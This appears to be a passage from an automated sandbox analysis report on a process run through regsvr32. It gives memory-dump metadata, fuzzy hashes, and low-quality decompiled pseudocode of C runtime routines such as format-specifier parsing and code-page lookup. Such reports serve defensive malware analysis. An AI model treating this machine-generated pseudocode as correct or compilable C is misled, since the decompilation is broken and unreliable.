                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                                                        • String ID:
                                                                                        • API String ID: 2452617236-0
                                                                                        • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                        • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                                                                        • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                        • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 27%
                                                                                        			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                                                                        				long long _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				int _v28;
                                                                                        				int _v32;
                                                                                        				char _v64;
                                                                                        				long long _v72;
                                                                                        				intOrPtr _t29;
                                                                                        				intOrPtr* _t41;
                                                                                        
                                                                                        				_t41 = __rax;
                                                                                        				_a8 = __ecx;
                                                                                        				_v16 = 0xfffffffe;
                                                                                        				_v72 = 0;
                                                                                        				0xf9d266b0();
                                                                                        				 *0xf9d4cd68 = 0;
                                                                                        				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
                                                                                        				 *0xf9d4cd68 = 1;
                                                                                        				_v32 = GetOEMCP();
                                                                                        				E000007FE7FEF9D26800( &_v64);
                                                                                        				goto 0xf9d29fe3;
                                                                                        				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
                                                                                        				 *0xf9d4cd68 = 1;
                                                                                        				_v28 = GetACP();
                                                                                        				E000007FE7FEF9D26800( &_v64);
                                                                                        				_t29 = _v28;
                                                                                        				goto 0xf9d29fe3;
                                                                                        				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
                                                                                        				 *0xf9d4cd68 = 1;
                                                                                        				E000007FE7FEF9D26840(_t29,  &_v64);
                                                                                        				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                                                                        				E000007FE7FEF9D26800( &_v64);
                                                                                        				goto 0xf9d29ff9;
                                                                                        				_v20 = _a8;
                                                                                        				E000007FE7FEF9D26800( &_v64);
                                                                                        				return _v20;
                                                                                        			}












                                                                                        0x7fef9d29f20
                                                                                        0x7fef9d29f20
                                                                                        0x7fef9d29f28
                                                                                        0x7fef9d29f31
                                                                                        0x7fef9d29f44
                                                                                        0x7fef9d29f4a
                                                                                        0x7fef9d29f59
                                                                                        0x7fef9d29f5b
                                                                                        0x7fef9d29f6b
                                                                                        0x7fef9d29f74
                                                                                        0x7fef9d29f7f
                                                                                        0x7fef9d29f86
                                                                                        0x7fef9d29f88
                                                                                        0x7fef9d29f98
                                                                                        0x7fef9d29fa1
                                                                                        0x7fef9d29fa6
                                                                                        0x7fef9d29fac
                                                                                        0x7fef9d29fb3
                                                                                        0x7fef9d29fb5
                                                                                        0x7fef9d29fc4
                                                                                        0x7fef9d29fcf
                                                                                        0x7fef9d29fd8
                                                                                        0x7fef9d29fe1
                                                                                        0x7fef9d29fe7
                                                                                        0x7fef9d29ff0
                                                                                        0x7fef9d29ffd

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_
                                                                                        • String ID:
                                                                                        • API String ID: 1901436342-0
                                                                                        • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                        • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                                                                        • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                        • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                                                        • API String ID: 2123368286-552404435
                                                                                        • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                        • Instruction ID: a80555c9662aee50eaf55af6b2d7c09464ca7ea00ccabcf41043a4b878837ec0
                                                                                        • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                        • Instruction Fuzzy Hash: 4B511726A0DBC586E6B48B19E84476EB3E0F386361F204625D6ED43BE8DF7ED4458B01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 28%
                                                                                        			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                        				void* _t184;
                                                                                        				char* _t204;
                                                                                        				char* _t205;
                                                                                        
                                                                                        				_a112 = 0;
                                                                                        				_a108 = _a112;
                                                                                        				_a88 = _a108;
                                                                                        				_a92 = _a88;
                                                                                        				_a80 = 0;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				_a76 = 0;
                                                                                        				_a968 = _a696 & 0x000000ff;
                                                                                        				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                                                        				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                                                        				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                                                        				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                                                        				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000001;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000002;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				asm("bts eax, 0x7");
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000008;
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                                                        				_t204 =  &_a1112;
                                                                                        				_a88 = E000007FE7FEF9D31E40(_t204);
                                                                                        				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				_a88 =  ~_a88;
                                                                                        				goto 0xf9d3bdd5;
                                                                                        				_a88 = _t184 + _t204 - 0x30;
                                                                                        				_a116 = 0;
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                                        				_t205 =  &_a1112;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t205);
                                                                                        				if (_a116 >= 0) goto 0xf9d3be14;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3be2d;
                                                                                        				_a116 = _t184 + _t205 - 0x30;
                                                                                        				_a972 = _a696 & 0x000000ff;
                                                                                        				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                                        				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                                        				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                                        				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                                        				_a1096 = _a1096 + 1;
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3beb2;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				_a704 = 0;
                                                                                        				goto E000007FE7FEF9D3BB66;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a976 = _a696;
                                                                                        				_a976 = _a976 - 0x41;
                                                                                        				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                                        				goto __rax;
                                                                                        			}






                                                                                        0x7fef9d3bcbd
                                                                                        0x7fef9d3bcc9
                                                                                        0x7fef9d3bcd1
                                                                                        0x7fef9d3bcd9
                                                                                        0x7fef9d3bcdd
                                                                                        0x7fef9d3bce5
                                                                                        0x7fef9d3bced
                                                                                        0x7fef9d3bd02
                                                                                        0x7fef9d3bd11
                                                                                        0x7fef9d3bd1b
                                                                                        0x7fef9d3bd25
                                                                                        0x7fef9d3bd2f
                                                                                        0x7fef9d3bd39
                                                                                        0x7fef9d3bd3b
                                                                                        0x7fef9d3bd44
                                                                                        0x7fef9d3bd48
                                                                                        0x7fef9d3bd51
                                                                                        0x7fef9d3bd55
                                                                                        0x7fef9d3bd5e
                                                                                        0x7fef9d3bd62
                                                                                        0x7fef9d3bd68
                                                                                        0x7fef9d3bd70
                                                                                        0x7fef9d3bd79
                                                                                        0x7fef9d3bd8d
                                                                                        0x7fef9d3bd8f
                                                                                        0x7fef9d3bd9c
                                                                                        0x7fef9d3bda5
                                                                                        0x7fef9d3bdae
                                                                                        0x7fef9d3bdb8
                                                                                        0x7fef9d3bdbc
                                                                                        0x7fef9d3bdd1
                                                                                        0x7fef9d3bdda
                                                                                        0x7fef9d3bdf2
                                                                                        0x7fef9d3bdf4
                                                                                        0x7fef9d3be01
                                                                                        0x7fef9d3be0a
                                                                                        0x7fef9d3be0c
                                                                                        0x7fef9d3be14
                                                                                        0x7fef9d3be29
                                                                                        0x7fef9d3be3a
                                                                                        0x7fef9d3be49
                                                                                        0x7fef9d3be53
                                                                                        0x7fef9d3be61
                                                                                        0x7fef9d3be6b
                                                                                        0x7fef9d3be71
                                                                                        0x7fef9d3be84
                                                                                        0x7fef9d3be91
                                                                                        0x7fef9d3be9d
                                                                                        0x7fef9d3bea5
                                                                                        0x7fef9d3beae
                                                                                        0x7fef9d3beb2
                                                                                        0x7fef9d3bebb
                                                                                        0x7fef9d3bed1
                                                                                        0x7fef9d3bee2
                                                                                        0x7fef9d3bef0
                                                                                        0x7fef9d3befc
                                                                                        0x7fef9d3bf04
                                                                                        0x7fef9d3bf17
                                                                                        0x7fef9d3bf28
                                                                                        0x7fef9d3bf36
                                                                                        0x7fef9d3bf42
                                                                                        0x7fef9d3bf4a
                                                                                        0x7fef9d3bf5a
                                                                                        0x7fef9d3bf6a
                                                                                        0x7fef9d3bf7a
                                                                                        0x7fef9d3bf8a
                                                                                        0x7fef9d3bf9a
                                                                                        0x7fef9d3bfaa
                                                                                        0x7fef9d3bfac
                                                                                        0x7fef9d3bfae
                                                                                        0x7fef9d3bfb9
                                                                                        0x7fef9d3bfbe
                                                                                        0x7fef9d3bfc7
                                                                                        0x7fef9d3bfcb
                                                                                        0x7fef9d3bfd1
                                                                                        0x7fef9d3bfe6
                                                                                        0x7fef9d3bff7
                                                                                        0x7fef9d3c006
                                                                                        0x7fef9d3c02d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2192614184-192189897
                                                                                        • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                        • Instruction ID: 366f55b25be61a8d80973343189ccb34eb8cf05d0f6555861afeb0151a731927
                                                                                        • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                        • Instruction Fuzzy Hash: 1A414C72A0D6C28AE3B0DB24E8547BEB7E4F384345F600126E6D887AA9DB7DD541CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 28%
                                                                                        			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                        				void* _t184;
                                                                                        				char* _t204;
                                                                                        				char* _t205;
                                                                                        
                                                                                        				_a112 = 0;
                                                                                        				_a108 = _a112;
                                                                                        				_a88 = _a108;
                                                                                        				_a92 = _a88;
                                                                                        				_a80 = 0;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				_a76 = 0;
                                                                                        				_a1404 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                                                        				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                                                        				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                                                        				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                                                        				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000001;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000002;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				asm("bts eax, 0x7");
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000008;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                                        				_t204 =  &_a1560;
                                                                                        				_a88 = E000007FE7FEF9D31E40(_t204);
                                                                                        				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				_a88 =  ~_a88;
                                                                                        				goto 0xf9d3dd83;
                                                                                        				_a88 = _t184 + _t204 - 0x30;
                                                                                        				_a116 = 0;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                                        				_t205 =  &_a1560;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t205);
                                                                                        				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3dddb;
                                                                                        				_a116 = _t184 + _t205 - 0x30;
                                                                                        				_a1408 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                                        				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                                        				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                                        				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                                        				goto 0xf9d3df88;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                                        				_a1544 =  &(_a1544[1]);
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3de61;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                                        				goto 0xf9d3df6d;
                                                                                        				_a1216 = 0;
                                                                                        				goto E000007FE7FEF9D3DC41;
                                                                                        				goto 0xf9d3df88;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}






                                                                                        0x7fef9d3dc6b
                                                                                        0x7fef9d3dc77
                                                                                        0x7fef9d3dc7f
                                                                                        0x7fef9d3dc87
                                                                                        0x7fef9d3dc8b
                                                                                        0x7fef9d3dc93
                                                                                        0x7fef9d3dc9b
                                                                                        0x7fef9d3dcb0
                                                                                        0x7fef9d3dcbf
                                                                                        0x7fef9d3dcc9
                                                                                        0x7fef9d3dcd3
                                                                                        0x7fef9d3dcdd
                                                                                        0x7fef9d3dce7
                                                                                        0x7fef9d3dce9
                                                                                        0x7fef9d3dcf2
                                                                                        0x7fef9d3dcf6
                                                                                        0x7fef9d3dcff
                                                                                        0x7fef9d3dd03
                                                                                        0x7fef9d3dd0c
                                                                                        0x7fef9d3dd10
                                                                                        0x7fef9d3dd16
                                                                                        0x7fef9d3dd1e
                                                                                        0x7fef9d3dd27
                                                                                        0x7fef9d3dd3b
                                                                                        0x7fef9d3dd3d
                                                                                        0x7fef9d3dd4a
                                                                                        0x7fef9d3dd53
                                                                                        0x7fef9d3dd5c
                                                                                        0x7fef9d3dd66
                                                                                        0x7fef9d3dd6a
                                                                                        0x7fef9d3dd7f
                                                                                        0x7fef9d3dd88
                                                                                        0x7fef9d3dda0
                                                                                        0x7fef9d3dda2
                                                                                        0x7fef9d3ddaf
                                                                                        0x7fef9d3ddb8
                                                                                        0x7fef9d3ddba
                                                                                        0x7fef9d3ddc2
                                                                                        0x7fef9d3ddd7
                                                                                        0x7fef9d3dde8
                                                                                        0x7fef9d3ddf7
                                                                                        0x7fef9d3de01
                                                                                        0x7fef9d3de0f
                                                                                        0x7fef9d3de19
                                                                                        0x7fef9d3de1f
                                                                                        0x7fef9d3de32
                                                                                        0x7fef9d3de40
                                                                                        0x7fef9d3de4c
                                                                                        0x7fef9d3de54
                                                                                        0x7fef9d3de5d
                                                                                        0x7fef9d3de61
                                                                                        0x7fef9d3de6a
                                                                                        0x7fef9d3de80
                                                                                        0x7fef9d3de91
                                                                                        0x7fef9d3de9f
                                                                                        0x7fef9d3deab
                                                                                        0x7fef9d3deb3
                                                                                        0x7fef9d3dec6
                                                                                        0x7fef9d3ded7
                                                                                        0x7fef9d3dee5
                                                                                        0x7fef9d3def1
                                                                                        0x7fef9d3def9
                                                                                        0x7fef9d3df09
                                                                                        0x7fef9d3df19
                                                                                        0x7fef9d3df29
                                                                                        0x7fef9d3df39
                                                                                        0x7fef9d3df49
                                                                                        0x7fef9d3df59
                                                                                        0x7fef9d3df5b
                                                                                        0x7fef9d3df5d
                                                                                        0x7fef9d3df68
                                                                                        0x7fef9d3df6d
                                                                                        0x7fef9d3df76
                                                                                        0x7fef9d3df7a
                                                                                        0x7fef9d3df80
                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2192614184-734865713
                                                                                        • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                        • Instruction ID: 2534415b6cec3e8c7a7064d8bee2958269565171124d4a2b4bf05b50673a9d36
                                                                                        • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                        • Instruction Fuzzy Hash: 4C411CB2A0C6C18AE3B0CB64E8447BEB7E0F384345F600125E6D987AA8DB7DD444CF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 28%
                                                                                        			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                                                                        				void* _t190;
                                                                                        				char* _t210;
                                                                                        				char* _t211;
                                                                                        
                                                                                        				_a76 = 1;
                                                                                        				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                                                                        				_a112 = 0;
                                                                                        				_a108 = _a112;
                                                                                        				_a88 = _a108;
                                                                                        				_a92 = _a88;
                                                                                        				_a80 = 0;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				_a76 = 0;
                                                                                        				_a1404 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                                                        				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                                                        				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                                                        				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                                                        				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000001;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000002;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				asm("bts eax, 0x7");
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000008;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                                        				_t210 =  &_a1560;
                                                                                        				_a88 = E000007FE7FEF9D31E40(_t210);
                                                                                        				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				_a88 =  ~_a88;
                                                                                        				goto 0xf9d3dd83;
                                                                                        				_a88 = _t190 + _t210 - 0x30;
                                                                                        				_a116 = 0;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                                        				_t211 =  &_a1560;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t211);
                                                                                        				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3dddb;
                                                                                        				_a116 = _t190 + _t211 - 0x30;
                                                                                        				_a1408 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                                        				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                                        				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                                        				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                                        				goto 0xf9d3df88;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                                        				_a1544 =  &(_a1544[1]);
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3de61;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
